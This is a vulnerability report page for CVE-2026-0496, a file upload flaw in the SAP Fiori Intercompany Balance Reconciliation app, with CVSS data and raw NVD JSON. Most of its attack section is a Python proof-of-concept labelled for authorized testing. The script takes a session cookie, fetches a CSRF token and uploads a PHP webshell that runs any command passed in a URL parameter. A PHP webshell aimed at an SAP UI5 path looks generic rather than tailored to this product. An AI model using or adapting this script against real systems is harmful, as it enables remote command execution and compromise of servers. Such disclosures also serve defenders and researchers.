Security Vulnerability Report
CVE-2026-0496 CVSS 6.6 MEDIUM

CVE-2026-0496

Published: 2026-01-13 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to upload any file (including script files) without proper file format validation. This has low impact on confidentiality, integrity and availability of the application.

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (see SAP Note 3565506 for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

#!/usr/bin/env python3
# CVE-2026-0496 PoC - SAP Fiori Arbitrary File Upload
# Note: This PoC is for educational and authorized testing purposes only

import requests
import sys

TARGET_URL = "https://<sap-host>/sap/bc/ui5_ui5/sap/arfb_recon/"  # Replace with target
UPLOAD_ENDPOINT = "upload"  # Adjust based on actual endpoint


def create_webshell():
    """Create a simple webshell for testing"""
    webshell_content = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    return webshell_content


def upload_file(session_cookie):
    """Upload malicious file without proper validation"""
    files = {
        'file': ('test.php', create_webshell(), 'application/x-php')
    }
    headers = {
        'Cookie': f'SAP_SESSIONID={session_cookie}',
        'X-CSRF-Token': 'fetch'  # Get CSRF token first
    }

    # Step 1: Get CSRF token
    response = requests.get(TARGET_URL, headers=headers, verify=False)
    csrf_token = response.headers.get('X-CSRF-Token', '')

    # Step 2: Upload file
    headers['X-CSRF-Token'] = csrf_token
    upload_url = TARGET_URL + UPLOAD_ENDPOINT
    try:
        response = requests.post(upload_url, files=files, headers=headers, verify=False)
        if response.status_code == 200:
            print("[+] File uploaded successfully")
            return True
        else:
            print(f"[-] Upload failed: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2026-0496 PoC - SAP Fiori File Upload")
    print("Requires authenticated session with high privileges")
    # Usage: python poc.py <session_cookie>
    if len(sys.argv) > 1:
        upload_file(sys.argv[1])
    else:
        print("Usage: python poc.py <session_cookie>")

References

https://me.sap.com/notes/3565506
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{
  "cve": {
    "id": "CVE-2026-0496",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T02:15:51.990",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to upload any file (including script files) without proper file format validation. This has low impact on confidentiality, integrity and availability of the application."
      },
      {
        "lang": "es",
        "value": "La aplicación SAP Fiori Reconciliación de Saldos Intercompañía permite a un atacante con privilegios elevados subir cualquier archivo (incluyendo archivos de script) sin una validación adecuada del formato de archivo. Esto tiene un bajo impacto en la confidencialidad, integridad y disponibilidad de la aplicación."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L",
            "baseScore": 6.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-434"}
        ]
      }
    ],
    "references": [
      {"url": "https://me.sap.com/notes/3565506", "source": "[email protected]"},
      {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}
    ]
  }
}